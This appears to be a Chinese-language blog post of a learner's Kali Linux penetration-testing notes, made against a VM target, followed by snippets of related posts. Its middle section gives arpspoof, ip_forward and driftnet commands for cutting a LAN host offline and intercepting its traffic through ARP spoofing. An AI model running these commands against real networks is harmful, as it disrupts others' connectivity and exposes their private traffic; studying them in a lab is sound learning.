對滲透感興趣,這些天研究了一下kali,搞了個課程,在vm上搭建了個靶機:
對於kali的安裝不做過多陳述,網上很多教程,以下把我學習到的筆記記錄,更新中。
1 sqlmap sql注入 ,沒啥好說,id=1測試,注入,基本行不通
2.arps 欺騙攻擊,使得內網主機斷網
(1)先檢視網絡卡是多少: ifconfig
(2) arps攻擊:
--arpspoof -i eth0 -t ***(目標ip) -r ***(閘道器) 可以使斷網
3. arpspoof 擷取內網其他使用者的流量
(1)先開啟內網**,不讓目標容易察覺出問題:
cat /proc/sys/net/ipv4/ip
echo 1 >/proc/sys/net/ipv4/ip_forward
(2)然後攻擊,先將目標流量轉移閘道器
--arpspoof -i eth0 -t ***(目標ip) ***(閘道器)
--arpspoof -i eth0 -t ***(閘道器) *** (自身ip)
(3)擷取目標主機的流量,例如檢視他再看的
driftnet -i eth0
滲透入門學習之http資料報
為什麼可以截斷資料報?http是一種無狀態資料,對資料報攔截不影響它的狀態 http修改資料報作用 漏洞測試 目錄遍歷 注入 繞過授權 xss跨站 弱口令爆破 上傳繞過 探測waf機制 這些還不懂,慢慢來 http請求 請求行 請求頭標 空行和請求資料 1.請求行 請求行由三個標記組成 請求方法 請...
kali linux網路滲透
kali linux網路滲透 kali linux是基於debian的linux發行版,設計用於數字取證和滲透測試。由offensive security ltd維護和資助。最先由offensive security的mati aharoni和devon kearns通過重寫backtrack來完成...
kali linux入門1 安裝
apt install open vm tools desktop fuse4將安裝包源更為換國內源 阿里雲 1 重啟登入root賬號 2 在終端開啟配置檔案 vim etc apt sources.list 3 用vim修改檔案 注釋原有源 按i健插入新源 deb kali rolling mai...